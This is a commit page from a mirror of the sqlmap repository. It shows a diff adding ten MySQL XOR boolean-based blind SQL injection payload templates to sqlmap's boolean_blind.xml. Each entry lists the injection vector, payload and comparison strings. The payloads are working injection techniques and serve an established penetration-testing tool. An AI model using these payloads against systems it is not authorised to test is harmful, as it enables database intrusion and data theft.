sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-07-25 23:49:49 +03:00
Code Issues Packages Projects Releases Wiki Activity

MySQL boolean-blind XOR payloads

Browse Source
This commit is contained in:
Nikola Pepelishev 2022-02-09 12:35:19 +02:00
parent 25d6479f91
commit 2e6ab65cc0
1 changed files with 205 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

205
data/xml/payloads/boolean_blind.xml
View File

@ -187,6 +187,26 @@ Tag: <test>
</response>
</test>
<test>
<title>XOR boolean-based blind - WHERE or HAVING clause</title>
<stype>1</stype>
<level>1</level>
<risk>3</risk>
<clause>1,9</clause>
<where>2</where>
<vector>XOR [INFERENCE]</vector>
<request>
<payload>XOR [RANDNUM]=[RANDNUM]</payload>
</request>
<response>
<comparison>XOR [RANDNUM]=[RANDNUM1]</comparison>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.6</dbms_version>
</details>
</test>
<test>
<title>OR boolean-based blind - WHERE or HAVING clause (NOT)</title>
<stype>1</stype>
@ -203,6 +223,26 @@ Tag: <test>
</response>
</test>
<test>
<title>XOR boolean-based blind - WHERE or HAVING clause (NOT)</title>
<stype>1</stype>
<level>1</level>
<risk>3</risk>
<clause>1,9</clause>
<where>2</where>
<vector>XOR NOT [INFERENCE]</vector>
<request>
<payload>XOR NOT [RANDNUM]=[RANDNUM1]</payload>
</request>
<response>
<comparison>XOR NOT [RANDNUM]=[RANDNUM]</comparison>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.6</dbms_version>
</details>
</test>
<test>
<title>AND boolean-based blind - WHERE or HAVING clause (subquery - comment)</title>
<stype>1</stype>
@ -237,6 +277,27 @@ Tag: <test>
</response>
</test>
<test>
<title>XOR boolean-based blind - WHERE or HAVING clause (subquery - comment)</title>
<stype>1</stype>
<level>2</level>
<risk>3</risk>
<clause>1,9</clause>
<where>2</where>
<vector>XOR [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</vector>
<request>
<payload>XOR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</payload>
<comment>[GENERIC_SQL_COMMENT]</comment>
</request>
<response>
<comparison>XOR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</comparison>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.6</dbms_version>
</details>
</test>
<test>
<title>AND boolean-based blind - WHERE or HAVING clause (comment)</title>
<stype>1</stype>
@ -271,6 +332,27 @@ Tag: <test>
</response>
</test>
<test>
<title>XOR boolean-based blind - WHERE or HAVING clause (comment)</title>
<stype>1</stype>
<level>2</level>
<risk>3</risk>
<clause>1</clause>
<where>2</where>
<vector>XOR [INFERENCE]</vector>
<request>
<payload>XOR [RANDNUM]=[RANDNUM]</payload>
<comment>[GENERIC_SQL_COMMENT]</comment>
</request>
<response>
<comparison>XOR [RANDNUM]=[RANDNUM1]</comparison>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.6</dbms_version>
</details>
</test>
<test>
<title>OR boolean-based blind - WHERE or HAVING clause (NOT - comment)</title>
<stype>1</stype>
@ -288,6 +370,27 @@ Tag: <test>
</response>
</test>
<test>
<title>XOR boolean-based blind - WHERE or HAVING clause (NOT - comment)</title>
<stype>1</stype>
<level>4</level>
<risk>3</risk>
<clause>1</clause>
<where>1</where>
<vector>XOR NOT [INFERENCE]</vector>
<request>
<payload>XOR NOT [RANDNUM]=[RANDNUM]</payload>
<comment>[GENERIC_SQL_COMMENT]</comment>
</request>
<response>
<comparison>XOR NOT [RANDNUM]=[RANDNUM1]</comparison>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.6</dbms_version>
</details>
</test>
<test>
<title>AND boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
<stype>1</stype>
@ -328,6 +431,27 @@ Tag: <test>
</details>
</test>
<test>
<title>XOR boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
<stype>1</stype>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<where>2</where>
<vector>XOR [INFERENCE]</vector>
<request>
<payload>XOR [RANDNUM]=[RANDNUM]</payload>
<comment>#</comment>
</request>
<response>
<comparison>XOR [RANDNUM]=[RANDNUM1]</comparison>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.6</dbms_version>
</details>
</test>
<test>
<title>OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)</title>
<stype>1</stype>
@ -348,6 +472,27 @@ Tag: <test>
</details>
</test>
<test>
<title>XOR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)</title>
<stype>1</stype>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<where>2</where>
<vector>XOR NOT [INFERENCE]</vector>
<request>
<payload>XOR NOT [RANDNUM]=[RANDNUM1]</payload>
<comment>#</comment>
</request>
<response>
<comparison>XOR NOT [RANDNUM]=[RANDNUM]</comparison>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.6</dbms_version>
</details>
</test>
<test>
<title>AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)</title>
<stype>1</stype>
@ -445,6 +590,26 @@ Tag: <test>
</details>
</test>
<test>
<title>MySQL XOR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)</title>
<stype>1</stype>
<level>3</level>
<risk>3</risk>
<clause>1,2,3</clause>
<where>2</where>
<vector>XOR MAKE_SET([INFERENCE],[RANDNUM])</vector>
<request>
<payload>XOR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
</request>
<response>
<comparison>XOR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.6</dbms_version>
</details>
</test>
<test>
<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)</title>
<stype>1</stype>
@ -483,6 +648,26 @@ Tag: <test>
</details>
</test>
<test>
<title>MySQL XOR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)</title>
<stype>1</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3</clause>
<where>2</where>
<vector>XOR ELT([INFERENCE],[RANDNUM])</vector>
<request>
<payload>XOR ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
</request>
<response>
<comparison>XOR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.6</dbms_version>
</details>
</test>
<test>
<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
<stype>1</stype>
@ -521,6 +706,26 @@ Tag: <test>
</details>
</test>
<test>
<title>MySQL XOR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
<stype>1</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<where>2</where>
<vector>XOR ([INFERENCE])*[RANDNUM]</vector>
<request>
<payload>XOR ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
</request>
<response>
<comparison>XOR ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.6</dbms_version>
</details>
</test>
<test>
<title>PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)</title>
<stype>1</stype>